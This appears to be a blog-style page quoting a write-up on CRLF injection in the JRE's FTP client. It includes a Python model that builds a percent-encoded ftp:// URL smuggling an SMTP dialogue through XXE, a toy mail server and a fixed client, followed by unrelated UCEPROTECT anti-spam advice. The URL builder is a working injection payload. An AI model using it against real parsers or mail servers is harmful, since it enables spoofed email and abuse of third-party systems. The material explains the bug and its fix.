The (presumably ancient) code has a bug, though: it does not verify the syntax of the user name. RFC 959 specifies that a username may consist of a sequence of any of the 128 ASCII characters except <LF>. Guess what the JRE implementers forgot? Exactly: to check for the presence of <LF>. This means that if we put %0D%0A anywhere in the user part of the URL (or the password part for that matter), we can terminate the USER (or PASS) command and inject a new command into the FTP session.
Source: SMTP over XXE − how to send emails using Java’s XML parser – shift or die
So, if we send a USER command to a mail server instead of an FTP server, it will answer with an error code (since USER is not a valid SMTP command), but let us continue with our session. Combined with the bug mentioned above, this allows us to send arbitrary SMTP commands, which allows us to send emails.
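A worked model of the injection described above, added here as an example; it is not code from the shift or die post and not the JRE's FTP client. It builds an ftp:// URL whose user part carries a percent-encoded SMTP dialogue, shows what a client that skips the RFC 959 <LF> check puts on the wire for USER/PASS, feeds those bytes to a toy SMTP receiver so the injected commands and the harmless 500 reply to USER become visible, and contrasts it with a client that performs the missing check. The host names, addresses and function names are made up for the example.

```python
"""Model of CRLF injection through the user part of an ftp:// URL.

Added example, not the JRE's code. All hosts, addresses and names are
hypothetical.
"""
from urllib.parse import quote, unquote, urlsplit

CRLF = "\r\n"


def build_ftp_url(host, port, sender, recipient, subject, body):
    """Build the ftp:// URL an attacker would place in an XXE entity.

    The SMTP dialogue is percent-encoded into the *user* part; each %0D%0A
    ends the current FTP command, so every line after the first becomes
    a new command on the target's port 25 (the PASS part works the same way).
    """
    smtp_lines = [
        "HELO attacker.example",            # hypothetical client name
        f"MAIL FROM:<{sender}>",
        f"RCPT TO:<{recipient}>",
        "DATA",
        f"Subject: {subject}",
        "",                                 # header/body separator
        body,                               # no dot-stuffing in this toy
        ".",
        "QUIT",
    ]
    user = "x" + CRLF + CRLF.join(smtp_lines)   # "USER x" is the throw-away first line
    # safe='' so that ':', '@', '/', spaces and CR/LF are all percent-encoded
    return f"ftp://{quote(user, safe='')}:pw@{host}:{port}/x"


def _userinfo(url):
    """Percent-decode user and password the way a naive client does."""
    parts = urlsplit(url)
    return unquote(parts.username or "anonymous"), unquote(parts.password or "")


def buggy_ftp_client_bytes(url):
    """USER/PASS bytes sent by a client that never checks for <CR>/<LF>."""
    user, password = _userinfo(url)
    return f"USER {user}{CRLF}PASS {password}{CRLF}".encode("ascii")


def fixed_ftp_client_bytes(url):
    """Same client with the check RFC 959's <string> production requires:
    printable 7-bit ASCII and, in particular, no <CR> or <LF>."""
    user, password = _userinfo(url)
    for field in (user, password):
        if "\r" in field or "\n" in field or any(ord(c) > 127 for c in field):
            raise ValueError("RFC 959: USER/PASS arguments may not contain <CR>/<LF>")
    return f"USER {user}{CRLF}PASS {password}{CRLF}".encode("ascii")


def toy_smtp_server(wire):
    """Minimal SMTP receiver. Returns (replies, accepted_message_or_None)."""
    replies = ["220 mail.example ESMTP"]            # hypothetical banner
    envelope = {"from": None, "to": [], "data": None}
    message, in_data, data_lines = None, False, []
    for line in wire.decode("ascii", "replace").split(CRLF):
        if in_data:
            if line == ".":
                in_data = False
                envelope["data"] = CRLF.join(data_lines)
                message = {"from": envelope["from"], "to": list(envelope["to"]),
                           "data": envelope["data"]}
                replies.append("250 OK: queued")
            else:
                data_lines.append(line)
            continue
        if line == "":
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            replies.append("250 mail.example")
        elif verb == "MAIL" and arg.upper().startswith("FROM:"):
            envelope["from"] = arg[5:].strip("<>")
            replies.append("250 OK")
        elif verb == "RCPT" and arg.upper().startswith("TO:"):
            envelope["to"].append(arg[3:].strip("<>"))
            replies.append("250 OK")
        elif verb == "DATA":
            in_data, data_lines = True, []
            replies.append("354 End data with <CR><LF>.<CR><LF>")
        elif verb == "QUIT":
            replies.append("221 Bye")
            break
        else:
            # USER, PASS and anything else FTP-ish: an error reply, but the
            # session stays open. That is exactly what the injection relies on.
            replies.append(f"500 Unrecognized command: {verb}")
    return replies, message


if __name__ == "__main__":
    url = build_ftp_url("mail.example", 25, "a@attacker.example",
                        "victim@target.example", "hello", "sent via XXE")
    replies, msg = toy_smtp_server(buggy_ftp_client_bytes(url))
    print("\n".join(replies))
    print("accepted message:", msg)
    try:
        fixed_ftp_client_bytes(url)
    except ValueError as e:
        print("fixed client refused the URL:", e)
```

The toy server is deliberately lenient (no dot-stuffing, no syntax checks beyond the verb), which mirrors the point of the post: a real MTA also replies with a 5xx to USER and then keeps reading, so whatever the client sends after the first CRLF is processed as SMTP.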
Here are 4 things that we recommend in order to stay off the UCEPROTECT-Blacklists and the Backscatterer List:
1. Do not use abusive techniques on your systems, and also tell your customers with their own servers not to do so.
The following techniques are considered abusive, even though some seem to have become very popular.
Sender callouts (also known as Sender Verify or SAV) or any other kind of Backscatter.
via UCEPROTECT®-Network – Germany's first spam protection database.
2. Ensure that large amounts of garbage cannot be sent through your mailservers / smarthosts.
3. Ensure that your dynamic / dialups / homeusers cannot be abused as spam zombies.
4. Get a clue about new customers, secure your servers, and prevent open relays and open proxies at your dedicated-line customers and at customers with static IP addresses.